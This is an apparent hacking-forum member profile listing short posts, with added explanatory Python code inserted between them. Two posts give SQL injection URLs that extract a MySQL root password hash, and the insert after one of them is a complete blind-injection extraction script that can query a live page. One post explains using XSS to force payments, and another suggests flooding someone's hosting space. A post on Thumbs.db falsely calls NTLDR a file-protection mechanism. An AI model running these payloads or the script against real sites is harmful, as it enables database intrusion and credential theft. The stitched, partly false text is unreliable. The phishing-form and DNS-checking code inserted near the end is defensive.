Member profile

  • Content count: 67
  • Rank: HACK THE PLANET!
  • Website URL: http://www.wildcardsecurity.com/
  • Location: Around the corner

Posts
  1. Since you can use JavaScript and jQuery with XSS, one tactic you can use is kind of like session hijacking and cross-site referral forgery: because your XSS on the site has the site name in the referrer information, you can automate form submissions on the affected site in the context of the logged-in user. For example, if an attacker found an XSS vulnerability in a payment-processing web site, the attacker could use the vulnerability to send a malicious link to a logged-in user, which would then (using JScript or jQuery) force the logged-in user to send money to the attacker via a form submission. This would also bypass referrer checking in most cases because the domain name would be in the referrer URL. Click-n-pwn.

     NOTE: This is not something that I condone in any way. I am simply explaining the full potential of an XSS vulnerability.
  2. You may want to try some boolean enumeration. See if the following works:

     hxxp://*****.com/poll.php?id=1%20AND%201=1
     hxxp://*****.com/poll.php?id=1%20AND%201=0

     The first should return whatever is usually there, and I'm guessing that the second should make no "poll" display. If you get this far, you have a working true and false. If this is the case, then

     hxxp://*****.com/poll.php?id=1%20AND%20((ASCII((MID((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1),1,1))))>96)

     will tell you if the ASCII code of the first character of the password is greater than 96 (lowercase a or above). If this works, you'll want to break out an ASCII chart to cross-compare. You should be able to modify the above query to properly isolate the correct values. I am not 100% sure about MySQL 5.0, but I believe the hash to be stored in hexadecimal, meaning your possible ASCII codes will be 97-102 (a-f) and 48-57 (0-9). You may also want to find the length of the hash with the following comparison:

     hxxp://*****.com/poll.php?id=1%20AND%20((LENGTH((SELECT%20Password%20FROM%20mysql.user%20WHERE%20user='root'%20LIMIT%200,1)))>10)

     This will "return true" if the length of the hash is greater than ten. Happy hacking. Hope this helped.

     EDIT: SQL syntax.
     EDIT: One more thing -- you may want to check out the grants table. This will tell you if it's A) world accessible or you have the privileges you want. Just a thought.
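The post above shows two hand-built probes (one LENGTH comparison, one ASCII comparison against 96). The script below is an added example, not code from the poster: it generalises those probes into a binary search so that each character of the subquery's result costs about seven true/false requests instead of a walk through the ASCII chart. The target URL is hypothetical (the post masks the host as *****.com), the subquery is the one from the post, and the "simulated oracle" plus the sample hash are constructed here so the script runs offline; against a live page you would swap in `http_oracle`, which fetches the URL and checks whether the poll markup rendered.

```python
import re
import urllib.parse
import urllib.request

# Hypothetical target: the post masks the real host as *****.com.
TARGET = "http://example.invalid/poll.php"
# The subquery used in the post: root's hash from mysql.user.
SUBQUERY = "(SELECT Password FROM mysql.user WHERE user='root' LIMIT 0,1)"


def length_payload(n: int) -> str:
    """Injected condition that is true when the result is longer than n characters."""
    return f"1 AND (LENGTH({SUBQUERY})>{n})"


def char_payload(pos: int, n: int) -> str:
    """Injected condition that is true when the ASCII code of character `pos` (1-based) exceeds n."""
    return f"1 AND (ASCII(MID({SUBQUERY},{pos},1))>{n})"


def build_url(payload: str) -> str:
    """URL-encode the injected value into the id parameter (spaces become %20, as in the post)."""
    return f"{TARGET}?id={urllib.parse.quote(payload, safe='')}"


def http_oracle(marker: str):
    """Oracle for a live target (not exercised offline): true when the normal poll markup renders."""
    def oracle(payload: str) -> bool:
        with urllib.request.urlopen(build_url(payload), timeout=10) as resp:
            return marker in resp.read().decode("utf-8", errors="replace")
    return oracle


def bisect_greater(oracle, make_payload, lo: int, hi: int) -> int:
    """Find v with lo < v <= hi using an oracle that answers "v > n?" for make_payload(n)."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(make_payload(mid)):
            lo = mid      # v > mid
        else:
            hi = mid      # v <= mid
    return hi


def find_length(oracle, max_len: int = 64) -> int:
    # Edge case: an empty password makes LENGTH(...) > 0 false, so probe that first.
    if not oracle(length_payload(0)):
        return 0
    return bisect_greater(oracle, length_payload, 0, max_len)


def find_char(oracle, pos: int) -> str:
    # Assumes printable ASCII (32..126); widen the bounds for other data.
    return chr(bisect_greater(oracle, lambda n: char_payload(pos, n), 31, 126))


def extract(oracle, max_len: int = 64) -> str:
    """Recover the whole subquery result, one character at a time."""
    length = find_length(oracle, max_len)
    return "".join(find_char(oracle, i) for i in range(1, length + 1))


# --- Constructed stand-in for the vulnerable page, so the script runs offline -------------
_LEN_RE = re.compile(r"LENGTH\(.*\)>(\d+)\)$")
_CHR_RE = re.compile(r"ASCII\(MID\(.*,(\d+),1\)\)>(\d+)\)$")


def simulated_oracle(secret: str):
    """Evaluate the injected comparison against a known value with MySQL's semantics."""
    def oracle(payload: str) -> bool:
        m = _CHR_RE.search(payload)
        if m:
            pos, n = int(m.group(1)), int(m.group(2))
            ch = secret[pos - 1] if pos <= len(secret) else ""
            return (ord(ch) if ch else 0) > n      # ASCII('') is 0 in MySQL
        m = _LEN_RE.search(payload)
        if m:
            return len(secret) > int(m.group(1))
        raise ValueError("unrecognised payload: " + payload)
    return oracle


if __name__ == "__main__":
    # Constructed sample in the MySQL 4.1+ format ('*' plus 40 hex digits); not a real hash.
    demo = simulated_oracle("*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19")
    print(extract(demo))
```

Each probe is a full page fetch, so the binary search bounds (printable ASCII, 64 characters maximum) are what keep the request count manageable; if the page's true/false distinction is flaky, wrap the oracle so it repeats a request and only trusts a consistent answer.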
  3. If it were unary, there'd ONLY be 0. Binary (bi) from the Latin (two), or language of two: 0 and 1 are two different values, hence "binary". All data is stored in binary format. All ASCII codes have their own binary equivalent. Same goes for hex, etc. ad nauseam. All code executes in RAM or cache as binary. All packets are formatted in binary at one layer or another, especially if you inspect such low levels as Ethernet frames, etc. IP addresses are binary (at the packet level). As everything with a computer is deterministic, binary is what makes it so. The common thread, as it were.
  4. Wow. Judging from the fact that writing exploits is part of legitimate research for security firms, writing them shouldn't be illegal. I'd have to say using them on any gear other than your own is and should be; however, writing them and testing them is a necessary part of vulnerability confirmation: if you discover a vulnerability in code, you are not 100% sure it's vulnerable until you have written a test exploit. Even though this may only echo "I am vulnerable" back to the attacker, you've gotta do it as a researcher. Just part of life. Secondly, while I agree that viruses, released into the public, are both hazardous and problematic, and that releasing them, to the public, should be highly illegal: many distributed computing systems and artificial intelligence research machines have very worm-like properties in the way they distribute themselves across a network. Technically, because certain behavioral patterns and codes are being copied and quantified, this too can be considered a virus. As a result, I /don't/ think that /writing/ anything should be illegal; simply deploying it into an environment which can allow it to affect anything outside of your own network should be strictly prohibited (and right now, as I see it, is). In any case, no one likes Conficker, and if you're a researcher with /that much/ time on your hands, it might be worth the $250k to analyze and trace. Nmap has also made it somewhat easy to pinpoint infected machines. It does have some patch-detection bugs, though.
  5. Well, you may just want to try making it have an error. Usually if verbose errors are enabled it will freak out and give you the full path. For example:

     hxxp://anysiterunningw0rdpr3s$.com/wp-settings.php

     Dig around for an includes directory or something. You can almost always get it to fork an error of some sort.

     EDIT: Seeing as you're root, you may want to check out the mysql.user and the INFORMATION_SCHEMA tables. Since you're using the particular versions that you are: http://dev.mysql.com/doc/refman/5.0/en/inf...ion-schema.html

     Might even try:

     hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE host='localhost' AND user='root'),null--
     hxxp://*****.com/poll.php?id=1 union select null,null,(SELECT Password FROM mysql.user WHERE user='root' LIMIT 1),null--

     (SELECT Password FROM mysql.user WHERE host='localhost' AND user='root') or (SELECT Password FROM mysql.user WHERE user='root' LIMIT 1) may return a SQL 5.0 password hash, since you are running as root, after all.
  6. Because you're attacking the 'network' and not the 'host' or 'service' behind a 'port', you may want to think about the fact that networks are supported by network devices such as routers, switches, firewalls, NAC solutions, etc. Network devices generally use protocols like SNMP, OSPF, HSRP, RIP, CDP, STP, ICMP, BGP, and I'm sure there are plenty that I'm forgetting. These protocols all have RFCs, or "Requests For Comment", that dictate the specifications for communication using these protocols. Most of the time, network vulnerabilities (as opposed to server- or software-based vulnerabilities) are a result of misconfigured network devices or design flaws in the protocol handlers. When unauthenticated instructions can be sent to a network device, sometimes the network device does what it's told. This can cause all sorts of things; for example, if you find a BGP abuse, then you can specify another router as the border gateway. Hope this helps.
  7. The best place to leave them is by the smoker's bench.
  8. Thumbs.db is protected by the standard Windows file/memory protection mechanism, NTLDR, which is why Explorer just re-attribs stuff when you view the folder. You might be able to attrib -r -s -h NTLDR (I think it's in the root of the system drive (C:)) and then delete it, but if you do that you throw all the other file protection out the window. You also might be able to apply a binary patch to Explorer that prevents it from re-attrib'ing stuff. Hope this helps.
  9. I highly doubt that, because browsers work by sending a request to the DNS server and then they talk directly with the IP address instead of using the domain or URL. If you want to spend time home-brewing an application, then I guess it would be possible by monitoring all the DNS requests and blocking traffic to IP addresses which were not sent back from a DNS server. In any case, this is still easy to bypass.
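The home-brewed control the post sketches (allow a destination only if a resolver recently handed that IP back) looks like the following when run over a log. This is an added example, not the poster's code: the log format, timestamps, names and addresses are all constructed here, and the one design point the post leaves implicit is enforced explicitly, namely that an answer should stop vouching for an address once its TTL has run out.

```python
# Constructed sample log (not from the post). Format per line:
#   <ts> dns <name> A <ip> ttl=<seconds>      an answer seen from the resolver
#   <ts> conn <ip>:<port>                       an outbound connection attempt
LOG = """\
100 dns www.binrev.com A 203.0.113.10 ttl=300
101 conn 203.0.113.10:80
102 conn 198.51.100.7:443
110 dns cdn.example A 198.51.100.7 ttl=60
111 conn 198.51.100.7:443
500 conn 203.0.113.10:80
"""


class DnsGate:
    """Permit a destination only while a resolver answer for it is still within its TTL."""

    def __init__(self):
        self._expires = {}          # ip -> timestamp after which the answer no longer vouches

    def observe_answer(self, ts: int, ip: str, ttl: int) -> None:
        # A fresh answer for the same IP extends, never shortens, the window.
        self._expires[ip] = max(self._expires.get(ip, 0), ts + ttl)

    def permit(self, ts: int, ip: str) -> bool:
        expiry = self._expires.get(ip)
        return expiry is not None and ts <= expiry


def replay(log: str):
    """Feed the log through the gate and return (ts, ip, verdict) for every connection."""
    gate = DnsGate()
    verdicts = []
    for line in log.splitlines():
        ts_text, kind, rest = line.split(" ", 2)
        ts = int(ts_text)
        if kind == "dns":
            _name, _rtype, ip, ttl = rest.split()
            gate.observe_answer(ts, ip, int(ttl.split("=", 1)[1]))
        elif kind == "conn":
            ip = rest.rsplit(":", 1)[0]
            verdicts.append((ts, ip, "allow" if gate.permit(ts, ip) else "deny"))
    return verdicts


if __name__ == "__main__":
    for verdict in replay(LOG):
        print(*verdict)
```

The replay shows the limits the post points at: the connection at 102 is denied only because nothing resolved to that address yet, and the same address is allowed nine seconds later once any name at all resolves to it. The gate therefore only stops traffic to hard-coded IPs; anyone who controls a DNS name can still reach whatever they like.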
  10. I don't have an iPod, but if you can ssh into it, you should be able to 'dd' the drive and create an image. Maybe pipe it through telnet or netcat with a listening port on your local machine that pipes it into a file...
  11. Hey! I'm heading out tonight, should be there around 9-10 PM.
  12. Yeah, I noticed that myself. There are a couple other threads I've seen from members that have recently joined that make me think binrev is currently being hit by hordes of trolls.
  13. I did a little research on that hosting site and they don't give you /too much/ space for free. Makes me wonder if we could fill up his entire directory with like 50 MB of text logs so he can't do this stuff anymore..
  14. For starters, let's notice that the URL in the URL bar doesn't contain binrev.com. Now here's the code:

      <input type="hidden" name="act" value="Login" />
      <input type="hidden" name="CODE" value="01" />
      <input type="hidden" name="s" value="ece7a530afe53e91ae89129751338828" />
      <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" />
      <input type="hidden" name="CookieDate" value="1" />
      <h4>You are not logged in, you may log in below</h4>
      <div class="fieldwrap">
      <h4>Your account username</h4>
      <input type="text" size="20" maxlength="64" name="UserName" />
      <h4>Your account password</h4>
      <input type="password" size="20" name="PassWord" />
      <p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Log In" /></p>
      </div>
      </form>

      First, let's notice that the form method is "GET", not "POST". The real code to the forum is as follows:

      <form action="http://www.binrev.com/forums/index.php?act=Login&CODE=01" method="post" name="LOGIN" onsubmit="return ValidateForm()">
      <input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" />
      <div class="borderwrap">
      <div class="maintitle"><img src='style_images/green/nav_m.gif' border='0' alt='>' width='8' height='8' /> Log In</div>
      <div class='row2'>
      <div class="formsubtitle">Please enter your details below to log in</div>
      <div class="errorwrap" style='margin-bottom:0px;padding-bottom:0px'>
      <h4>Attention!</h4>
      <p>You must already have registered for an account before you can log in.<br />If you do not have an account, you may register by clicking the 'register' link near the top of the screen</p>
      <p><b>I've forgotten my password! <a href="http://www.binrev.com/forums/index.php?act=Reg&CODE=10">Click here!</a></b></p>
      </div>
      </div>
      <table class='ipbtable' cellspacing="0">
      <tr>
      <td width="60%" valign="top" class='row2'>
      <fieldset>
      <legend><b>Log In</b></legend>
      <table class='ipbtable' cellspacing="1">
      <tr>
      <td width="50%"><b>Enter your user name</b></td>
      <td width="50%"><input type="text" size="25" maxlength="64" name="UserName" /></td>
      </tr>
      <tr>
      <td width="50%"><b>Enter your password</b></td>
      <td width="50%"><input type="password" size="25" name="PassWord" /></td>
      </tr>
      </table>
      </fieldset>
      </td>
      <td width="40%" valign="top" class='row2'>
      <fieldset>
      <legend><b>Options</b></legend>
      <table class='ipbtable' cellspacing="1">
      <tr>
      <td width="10%"><input class='checkbox' type="checkbox" name="CookieDate" value="1" checked="checked" /></td>
      <td width="90%"><b>Remember me?</b><br /><span class="desc">This is not recommended for shared computers</span></td>
      </tr>
      <tr>
      <td width="10%"><input class='checkbox' type="checkbox" name="Privacy" value="1" /></td>
      <td width="90%"><b>Log in as invisible</b><br /><span class="desc">Don't add me to the active users list</span></td>
      </tr>
      </table>
      </fieldset>
      </td>
      </tr>
      <tr>
      <td class="formbuttonrow" colspan="2"><input class="button" type="submit" name="submit" value="Log me in" /></td>
      </tr>
      <tr>
      <td class="catend" colspan="2"><!-- no content --></td>
      </tr>
      </table>
      </div>
      </form>

      So I mean, look at the difference. Notice the action in the first code is "next.php" and that's not at all what the action is in the real src to the site. There are other differences between the codes, which I don't have to point out now - I'm sure it's becoming readily apparent.
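The three tells the post above works through by eye (the address bar is not binrev.com, the form action is a relative "next.php" on the attacker's host, and the method is GET rather than POST) can be checked mechanically. The script below is an added example, not the poster's code: it parses every form on a page, keeps the ones that collect a password, and reports each of those tells. The two sample pages are constructed here, trimmed from the markup quoted in the post; the phishing page's `<form action="next.php" method="get">` open tag is reconstructed from the post's description, since the quoted excerpt omits it, and the hosting URL phish.example is hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and the <input> elements inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                      # attribute values may be None
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),  # HTML default is GET
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": (a.get("type") or "text").lower(),
                                            "name": a.get("name") or ""})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _same_site(host: str, expected: str) -> bool:
    return host == expected or host.endswith("." + expected)


def audit_login_forms(html: str, page_url: str, expected_host: str):
    """Return one finding per password-collecting form, listing why it looks like a phish."""
    parser = FormCollector()
    parser.feed(html)
    page_host = urlparse(page_url).hostname or ""
    findings = []
    for form in parser.forms:
        if not any(i["type"] == "password" for i in form["inputs"]):
            continue
        target = urljoin(page_url, form["action"])       # resolves relative actions like next.php
        target_host = urlparse(target).hostname or ""
        reasons = []
        if not _same_site(page_host, expected_host):
            reasons.append(f"page served from {page_host}, not {expected_host}")
        if not _same_site(target_host, expected_host):
            reasons.append(f"credentials sent to {target_host}, not {expected_host}")
        if form["method"] != "post":
            reasons.append("method is GET: the password would land in the URL, logs and referer")
        findings.append({"action": target, "method": form["method"], "reasons": reasons})
    return findings


# Constructed sample pages, trimmed from the markup quoted in the post.
FAKE_PAGE = """
<form action="next.php" method="get">
<input type="hidden" name="act" value="Login" />
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?act=post&do=reply_post&f=5&t=38443" />
<h4>You are not logged in, you may log in below</h4>
<input type="text" size="20" maxlength="64" name="UserName" />
<input type="password" size="20" name="PassWord" />
<input class="button" type="submit" name="submit" value="Log In" />
</form>
"""

REAL_PAGE = """
<form action="http://www.binrev.com/forums/index.php?act=Login&CODE=01" method="post" name="LOGIN">
<input type="hidden" name="referer" value="http://www.binrev.com/forums/index.php?" />
<input type="text" size="25" maxlength="64" name="UserName" />
<input type="password" size="25" name="PassWord" />
<input class="button" type="submit" name="submit" value="Log me in" />
</form>
"""

if __name__ == "__main__":
    for url, page in (("http://phish.example/login.htm", FAKE_PAGE),
                      ("http://www.binrev.com/forums/index.php?act=Login&CODE=01", REAL_PAGE)):
        for finding in audit_login_forms(page, url, "binrev.com"):
            print(url, "->", finding["action"], finding["reasons"] or "ok")
```

The hidden "referer" field pointing back at binrev.com is deliberately not treated as evidence of legitimacy: the phishing copy carries it too, because it was copied from the real page. What matters is where the credentials go, which is why the check resolves the action against the page URL before comparing hosts.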
  15. This kid is a lame phisher.